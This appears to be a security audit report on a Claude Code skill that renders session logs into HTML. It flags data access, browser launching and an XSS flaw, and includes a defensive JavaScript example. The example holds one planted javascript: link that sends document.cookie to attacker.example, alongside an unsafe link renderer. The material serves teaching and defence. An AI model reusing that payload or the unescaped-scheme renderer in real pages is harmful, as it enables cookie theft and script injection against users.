view-team-session

Pass

Audited by Gen Agent Trust Hub on Mar 7, 2026

Risk Level: SAFE
Finding categories: DATA_EXFILTRATION, COMMAND_EXECUTION, PROMPT_INJECTION
Full Analysis
  • [DATA_EXFILTRATION]: The script scripts/generate.py scans for and reads JSONL files within ~/.claude/projects/. These log files contain the complete record of user and agent interactions, which may include sensitive information shared during the session.
  • [COMMAND_EXECUTION]: The script uses the webbrowser module to automatically launch the generated HTML file in the user's default browser after processing.
  • [PROMPT_INJECTION]: The skill exhibits an indirect prompt injection surface by rendering untrusted data from session logs into an HTML viewer.
  • Ingestion points: JSONL files located at ~/.claude/projects/*/*.jsonl (referenced in scripts/generate.py).
  • Boundary markers: None; the logic parses and includes all conversation events.
  • Capability inventory: The skill can read local files, create directories and files in the .claude/output/ directory, and launch system processes (browser).
  • Sanitization: The file assets/template.html implements a custom Markdown parser that uses basic HTML escaping but fails to sanitize URL protocols in Markdown links, creating an XSS vulnerability where javascript: URIs can be executed.
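The link-rendering weakness described in the Sanitization finding, shown as an added example rather than the skill's own template.html code: a minimal Markdown link renderer with HTML escaping but no scheme check, beside a hardened version that allow-lists URL schemes. The function names, the allow-list, the base URL and the sample session text are assumptions made for the illustration.

```javascript
// Added example (not the skill's own template.html code): a minimal Markdown
// link renderer of the kind the finding describes, beside a hardened version.
// Function names, the scheme allow-list and the sample message are assumptions.

const LINK_RE = /\[([^\]]*)\]\(([^)\s]+)\)/g;

// Escapes text for HTML element and attribute contexts. This is the "basic HTML
// escaping" the finding credits the parser with: it blocks <script> injection
// but says nothing about what scheme a link points to.
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, (c) => ({
    '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;',
  })[c]);
}

// Vulnerable: the href is escaped but never validated, so a javascript: URI
// planted in an untrusted session log becomes a clickable script.
function renderLinksUnsafe(md) {
  return md.replace(LINK_RE, (_, text, url) =>
    `<a href="${escapeHtml(url)}">${escapeHtml(text)}</a>`);
}

// Scheme allow-list. Anything else (javascript:, data:, vbscript:, file: ...)
// is refused; relative links resolve against the base and pass as https.
const SAFE_SCHEMES = new Set(['http:', 'https:', 'mailto:']);

function isSafeUrl(url) {
  let parsed;
  try {
    // The WHATWG URL parser lowercases the scheme and strips tab/newline, so
    // "JaVaScRiPt:" and "java\nscript:" both normalize to "javascript:".
    parsed = new URL(url, 'https://viewer.invalid/');
  } catch {
    return false; // unparseable: refuse rather than guess
  }
  return SAFE_SCHEMES.has(parsed.protocol);
}

// Hardened: links with a disallowed scheme lose their href but keep their
// text, so the transcript still reads correctly and nothing is executable.
function renderLinksSafe(md) {
  return md.replace(LINK_RE, (_, text, url) => {
    if (!isSafeUrl(url)) {
      return `<span class="blocked-link">${escapeHtml(text)}</span>`;
    }
    return `<a href="${escapeHtml(url)}" rel="noopener noreferrer">${escapeHtml(text)}</a>`;
  });
}

// Constructed sample: one assistant message as it might appear in a session
// log, with a planted javascript: link next to an ordinary https: link.
const SAMPLE_MESSAGE =
  "Results: [open report](javascript:location='https://attacker.example/?c='+document.cookie) " +
  "or [read the docs](https://example.com/docs?a=1&b=2).";

if (typeof require !== 'undefined' && require.main === module) {
  console.log(renderLinksUnsafe(SAMPLE_MESSAGE));
  console.log(renderLinksSafe(SAMPLE_MESSAGE));
}
```

Escaping and scheme validation are separate controls: escaping keeps the log text out of the HTML parser, while the allow-list keeps the link target out of the script engine. Matching the string "javascript:" literally is not enough, because the URL parser accepts mixed case and embedded tabs or newlines in the scheme; parsing the URL and comparing the normalized protocol against a short allow-list handles those variants uniformly.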
Audit Metadata
Risk Level: SAFE
Analyzed: Mar 7, 2026, 02:39 AM